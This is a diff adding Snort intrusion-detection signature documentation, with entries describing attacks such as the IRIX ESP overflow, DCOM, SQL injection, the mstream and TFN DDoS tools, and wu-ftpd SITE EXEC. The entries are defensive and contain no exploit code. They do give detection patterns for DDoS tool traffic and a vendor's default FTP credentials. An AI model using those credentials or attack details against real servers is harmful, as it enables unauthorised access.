+ICMP Redirect messages are generated by gateway devices when a shorter route to the destination exists.  When a gateway device receives an Internet datagram from a host on the same network a check is performed to determine the address of the next hop (gateway) in the route to the datagrams destination.  The datagram is then forward to the next hop on the route.  If this gateway device is also on the same network, the gateway device generates an ICMP Redirect message and sends it back to the host that originally generated the traffic.  The ICMP redirect message informs the original host that a shorter route exists and any additional traffic should be forwarded directly to the closer gateway device.
+
+--
+
+Attack Scenarios:
+Attackers on the local subnet could potentially use ICMP Redirect messages to force hosts to use compromised gateway devices.  
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+ICMP Redirect datagrams are legitimate Internet traffic if a shorter route to a destination actually exists.  
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 5 datagrams
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC792
+
+
+--
--- /dev/null
+++ b/doc/signatures/595.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+595
+
+--
+Summary:
+Embedded Support Partner (ESP) is an integral part of the SGI IRIX 
+operating system to enable remote support for the operating system
+
+A vulnerability exists in the Embedded Support Partner Daemon (ESP) that
+could lead to arbitrary commands being executed on a target host.
+
+--
+Impact:
+Remote super user access leading to a compromise of the target machine 
+along with any network resources that machine is connected to.
+
+--
+Detailed Information:
+The ESP daemon is an RPC (Remote Procedure Call) resource used on SGI 
+IRIX systems. The ESP daemon runs with the privileges of the root user. 
+IRIX version 6.5.8 and prior are susceptible to a buffer overflow of the
+ESP daemon leading to a remote root compromise of the affected host.
+
+--
+Affected Systems:
+SGI IRIX 6.5.8 and earlier.
+
+--
+Attack Scenarios:
+The attacker would need to craft a packet that would lead to the buffer
+overflow. No current exploits are available.
+
+--
+Ease of Attack:
+Difficult
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+All systems running vulnerable versions of rpc.espd should have the appropriate patch applied. 
+
+Additionally, the ESP daemon should be disabled where not needed by 
+commenting out the appropriate line in inetd.conf. The daemon itself can
+be made non-executable by removal of the x bit (chmod -x rpc.espd).
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0331
+
+Bugtraq:
+http://www.securityfocus.com/bid/2714
+
+--
--- /dev/null
+++ b/doc/signatures/1401.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1401
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000807.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000807
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "CommonSense" application running on a webserver. Access to the file "search.php" with SQL commands being passed as the "q" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "q" parameter in the "search.php" script used by the "CommonSense" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CommonSense
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/3260.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3260
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3088.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3088
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a client buffer
+overflow associated with Winamp's processing of a filename with an
+extension of .cda.
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user running Winamp.
+
+--
+Detailed Information:
+Winamp is a media file player for Windows developed by Nullsoft.  A buffer
+overflow exists because of insufficient bounds checking while handling the
+name of a CD audio format file (.cda extension) or a playlist that contains
+a filename with a .cda extension.  An overly long name may cause the buffer
+overflow permitting the execution of arbitrary code at the privilege level
+of the user running Winamp.
+
+--
+Affected Systems:
+	Winamp 3.x, and 5.x
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed .cda filename that may cause
+a buffer overflow and the subsequent execution of arbitrary code on the
+vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/243.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+243
+
+--
+Summary:
+This event is generated when the mstream DDoS tool is used.
+
+--
+Impact:
+Severe. This indicates a host may have been compromised and mstream may have been installed.  
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.
+
+There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack. An agent will attempt to contact its known handlers using a UDP packet to destination port 6838 with a string of "newserver" in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a mstream agent, it will attempt to communicate with its known handlers.
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There may be ports other than 6838 used for agent-to-handler communications.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+NAI:
+http://vil.nai.com/vil/content/v_98662.htm
+SecurityFocus:
+http://www.securityfocus.com/archive/82/58040
+CERT:
+http://www.cert.org/incident_notes/IN-2000-05.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
--- /dev/null
+++ b/doc/signatures/111-15.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+111-15
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. Possible attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated whent the pre-processor stream4 detects abnormal
+Time To Live (TTL) values in a datastream. This may indicate an attempt
+to evade an IDS.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker can set the TTL values of all packets to a value so small
+that only the IDS will see the packet and it will not get to the target
+system.
+
+-- 
+Ease of Attack: 
+Simple. Tools such as fragroute enable an attacker to do this.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Insertion, Evasion, and Denial of Service: Eluding Network Intrusion
+Detection:
+http://www.insecure.org/stf/secnet_ids/secnet_ids.html
+
+--
--- /dev/null
+++ b/doc/signatures/361.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+361
+
+--
+Summary:
+This event is generated when a remote user executes the SITE EXEC command in a session with an internal FTP server. This may indicate an attempt to exploit a vulnerability in the SITE EXEC command in wu-ftpd version 2.4.1.
+
+--
+Impact:
+Arbitrary code execution, leading to remote root compromise. The attacker must have a valid, non-anonymous FTP account on the server to attempt this exploit. 
+
+--
+Detailed Information:
+A misconfiguration in the pathnames.h configuration file in wu-ftpd 2.4.1 allows users to execute commands from /bin instead of ~username/bin. An attacker with a valid FTP account on the server can exploit this vulnerability to execute arbitrary shell code using the SITE EXEC command.
+
+--
+Affected Systems:
+Servers running Washington University wu-ftpd version 2.4.1 or earlier.
+
+--
+Attack Scenarios:
+An attacker logs into the system using a valid FTP account, and then executes arbitrary shell code to obtain root access to the server.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+If a legitimate remote user uses the SITE EXEC command, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a later version of the wu-ftp daemon.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0080
+
+CERT
+http://www.cert.org/advisories/CA-1995-16.html
+
+--
--- /dev/null
+++ b/doc/signatures/2334.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2334
+
+--
+Summary:
+This event is generated when an attempt is made to access a Yak! FTP
+server using the default username and password.
+
+--
+Impact:
+Administrative access to the server.
+
+--
+Detailed Information:
+Yak FTP servers have a default username and password of "user" and 
+"y049575046", if this is not changed by the administrator it is possible 
+for an attacker to gain unauthorised access to the server.
+
+--
+Affected Systems:
+	Yak FTP servers
+
+--
+Attack Scenarios:
+An attacker merely needs to login to the server using the default 
+username and password.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Change the username and password.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1709.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1709
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1390.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1390
+
+--
+Summary:
+This event is generated when an attempt is made to execute shellcode on 
+a host in the protected network from a source external to that network.
+
+--
+Impact:
+This set of instructions can be used as a NOOP to pad buffers on an x86 
+architecture machines.
+
+--
+Detailed Information:
+This is the x86 opcode for 'inc ebx'.  This can be used as a NOOP in an 
+x86 architecture, however as with all shellcode rules, this can cause 
+false positives.  Check to see if you are ignoring shellcode rules on 
+web ports, as this will reduce false positives.
+
+--
+Attack Scenarios:
+An attacker can pad buffers with this opcode, in an attempt to overflow 
+the buffer.
+
+--
+Ease of Attack:
+This is a generic rule designed to pick up this opcode in use.
+
+--
+False Positives:
+This will false positive if rule is not ignoring clear text ports every 
+time snort sees 24 'C' characters (hex code of 43) in a row.
+
+This is the x86 opcode for 'inc ebx'.  This can be used as a NOOP in an 
+x86 architecture, however as with all shellcode rules, this can cause 
+false positives.
+
+--
+False Negatives:
+none known
+
+--
+Corrective Action:
+none known
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Mike Poor <mike.poor@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CansecWest:
+http://cansecwest.com/noplist-v1-1.txt
+
+--
--- /dev/null
+++ b/doc/signatures/970.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1283
+
+--
+Summary:
+This event is generated when an attempt is made to cause a denial of service of WWW Publishing Service and IIS Administration software.
+
+--
+Impact:
+Denial of service.  This attack may cause a vulnerable server to stop.
+
+--
+Detailed Information:
+Outlook Web Access (OWA) is an optional feature of Microsoft Exchange Server that allows a user to access mail through a web interface supported by Internet Information Services (IIS).  A denial of service of the support software WWW Publishing service and IIS Administration can occur when a user enters a long string of '%' characters in the Log On field in OWA and enters these characcters in the username and password field received in the NT challenge dialog.
+
+--
+Affected Systems:
+Microsoft Exchange Server 5.5 and Microsoft Exchange Server 5.5 SP1, SP2, SP3, SP4
+
+--
+Attack Scenarios:
+An attacker can enter a long string of '%' characters in OWA Log On and challenge fields to cause a denial of service against a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the most current version of Microsoft Exchange Server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/3223
+
+--
--- /dev/null
+++ b/doc/signatures/249.txt
@@ -0,0 +1,58 @@
+Rule:
+--
+Sid:
+249
+
+--
+Summary:
+The event is generated when a DDoS mstream client makes contact with an mstream handler.
+
+--
+Impact:
+Severe. If the listed source IP is in your network, it is possibly an mstream client.  If the listed destination IP is in your network, it is possibly an mstream handler.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.At the highest level, clients communicate with handlers to inform them to launch attacks.  A client may contact a handler using a TCP SYN packet to destination port 15104.   
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes an mstream handler, the client will attempt to communicate with the handler.
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+A legitimate server port of 15104 will cause this rule to fire.  This rule may also generate a false positive if port 15104 is selected as an FTP data port.
+
+--
+False Negatives:
+There are other known client-to-handler ports in addition to 15104.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet filtering-firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
--- /dev/null
+++ b/doc/signatures/100000650.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000650
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "email" parameter in the "index.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2910.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2910
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2672.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+2672
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+sresult.exe.
+
+-- 
+Impact: 
+Possible cross site scripting.
+
+--
+Detailed Information:
+The executable file sresult.exe does not properly sanitize user input,
+as a result it may be possible for an attacker to leverage the binary in
+a cross site scripting attack.
+
+--
+Affected Systems:
+	Webcam Corp Webcam Watchdog 4.0.1 a
+
+--
+Attack Scenarios: 
+An attacker can leverage the sresult.exe binary in a cross site
+scripting attack.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script sresult.exe
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/251.txt
@@ -0,0 +1,69 @@
+Rule:
+--
+Sid:
+238
+
+--
+Summary:
+This event is generated when a command is sent to a Tribal Flood Network
+(TFN) Distributed Denial of Service (DDoS) daemon.
+
+--
+Impact:
+Attempted DDoS.  If the listed source IP is in your network, it may be a
+TFN client.  If the listed destination IP is in your network, it may be 
+a TFN daemon.
+
+--
+Detailed Information:
+The TFN DDoS uses a tiered structure of compromised hosts to coordinate 
+and participate in a distributed denial of service attack. Clients 
+communicate with daemons to inform them to launch attacks.
+
+This event is indicative of a client sending commands to a daemon.
+
+--
+Affected Systems:
+Any TFN compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a TFN daemon, it will respond to client requests.
+
+--
+Ease of Attack:
+Simple. TFN code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+Arachnids:
+http://www.whitehats.com/info/IDS183
+
+--
--- /dev/null
+++ b/doc/signatures/3040.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3040
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2613.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2613
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "revoke_surrogate_repcate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "userid" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/1042.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1042
+
+--
+Summary:
+This event is generated when an attempt is made to craft a URL
+containing the text 'Translate: f' in an attempt to view file source code.
+
+--
+Impact:
+Intelligence gathering.  This attack may permit disclosure of the source
+code of files not normally available for viewing.
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) 5.0 contains scripting
+engines to support various advanced files types such as .ASP and .HTR
+files.  This permits the execution of server-side processing.  IIS
+determines which scripting engine is appropriate to use depending on the
+file extension.  If an attacker crafts a URL request ending in
+'Translate: f' and followed by a slash '/', IIS fails to send the file
+to the appropriate scripting engine for processing.  Instead, it returns
+the source code of the referenced file to the browser.
+
+--
+Affected Systems:
+	Microsoft IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can craft a URL to include the 'Translate: f' and followed
+by a '/' to disclose source code on the vulnerable server. 
+
+--
+Ease of Attack:
+Simple.  Attack scripts are freely available.
+
+--
+False Positives:
+Some Microsoft applications make use of the 'Translate: f' header and
+may cause this rule to generate an event. These include applications that use WebDAV
+for publishing content on a webserver such as Microsoft Outlook Web Access (OWA)
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Original rule writer kinch@visto.com 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+False positive information contributed by Javier Fernandez-Sanguino
+
+--
+Additional References:
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
+
+--
--- /dev/null
+++ b/doc/signatures/3450.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3450
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3210.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3210
+
+--
